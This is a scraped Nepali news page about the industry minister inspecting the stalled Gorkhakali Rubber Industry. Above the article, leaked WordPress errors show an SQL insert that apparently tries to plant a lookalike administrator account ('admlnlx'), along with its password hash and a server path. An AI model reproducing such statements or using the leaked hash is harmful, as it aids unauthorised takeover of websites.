WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BIOSQjrpfbbNG3e0oJfQ52zBXiPlEH0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-27 11:10:02', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
गोरखकाली रबर उद्योगको निरीक्षण – Gaule Khabar

गोरखकाली रबर उद्योगको निरीक्षण

गोरखकाली रबर उद्योगको निरीक्षण

गोरखा, पुस १३–

उद्योगमन्त्री नवीन्द्रराज जोशीले आज गोरखाको मझुवा देउरालीस्थित गोरखकाली रबर उद्योगको निरीक्षण गर्नुभएको छ ।

विगत लामो समयदेखि उद्योगबाट नियमित रुपमा टायर उत्पादन नभएको अवस्थामा मन्त्री जोशीले उद्योगको वर्तमान अवस्थाबारे जानकारी लिनुभएको हो । गोरखकाली रबर उद्योग सञ्चालनका लागि सरकारले गृहकार्य गरिरहेको मन्त्री जोशीको भनाइ छ ।

मन्त्री जोशीले भन्नुभयो, “उद्योग नियमित रुपमा सञ्चालन गर्नुपर्छ । आज चलाउने भोलि बन्द हुने गर्नु हुँदैन ।” उद्योग सञ्चालन नहुँदा दिनहुँ ३०० भन्दा बढी कर्मचारीले काम पाएका छैनन् । कर्मचारीहरु हाजिर गर्न मात्रै उद्योग पुग्ने गरेका छन् । उद्योगभित्र रहेका मेसिन जीर्ण हुँदा र आवश्यकताअनुसार कच्चा पदार्थ ल्याउन नसक्दा उद्योग सञ्चालनमा ल्याउन नसकिएको हो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका